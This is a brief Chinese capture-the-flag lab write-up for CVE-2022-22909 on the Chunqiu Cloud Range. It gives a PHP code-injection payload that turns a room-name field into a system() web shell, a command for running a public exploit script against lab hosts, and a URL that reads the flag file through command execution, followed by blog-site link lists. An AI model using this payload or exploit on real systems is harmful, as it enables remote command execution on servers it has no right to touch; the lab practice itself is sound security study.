春秋云境 CVE-2022-22909

bug道一2025-12-01 22:20

前期准备

添加房间

复制代码 
{${system($_REQUEST[cmd])}}

poc地址

https://github.com/0z09e/CVE-2022-22909

poc使用

复制代码 
python exploit.py -t https://eci-2zeiki3y7m5txztvjdbi.cloudeci1.ichunqiu.com:80/ --noauth

之后访问

https://eci-2ze9m5xzmoww728cmfhc.cloudeci1.ichunqiu.com:80/dati/selectappartamenti.php?cmd=cat%20../../../../../flag

相关推荐
眠晚晚2 小时前
API攻防&系统攻防笔记分享
笔记·web安全·网络安全
漏洞文库-Web安全2 小时前
CTF密码学之SM4
安全·web安全·网络安全·密码学·ctf
知攻善防实验室3 小时前
双节期间,我收到了一封高危漏洞的邮件。
安全·网络安全
Bruce_Liuxiaowei8 小时前
Windows安全事件4625分析:检测登录失败与防范暴力破解
运维·windows·安全·网络安全
AI绘画小3310 小时前
CTF 逆向一脸懵?这篇攻略把破解技巧讲透,新手也能快速上手!
测试工具·web安全·网络安全
盛满暮色 风止何安10 小时前
WAF的安全策略
linux·运维·服务器·网络·网络协议·安全·网络安全
pandarking11 小时前
[CTF]攻防世界:ics-05
开发语言·javascript·web安全·网络安全·ecmascript
jenchoi41313 小时前
【2025-11-28】软件供应链安全日报:最新漏洞预警与投毒预警情报汇总
网络·安全·web安全·网络安全·npm
jenchoi41313 小时前
【2025-11-29】软件供应链安全日报:最新漏洞预警与投毒预警情报汇总
网络·安全·web安全·网络安全·npm
热门推荐
01GitHub 镜像站点02UV安装并设置国内源03BongoCat - 跨平台键盘猫动画工具04安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)05Linux下V2Ray安装配置指南06本地部署阿里最新开源的Z-Image07【保姆级教程】免费使用Gemini3的5种方法!免翻墙/国内直连0846个Nano-banana 精选提示词,持续更新中09Labelme从安装到标注:零基础完整指南10Meta第三代“分割一切”模型——SAM 3本地部署教程:首支持文本提示分割,400万概念、30毫秒响应,检测分割追踪一网打尽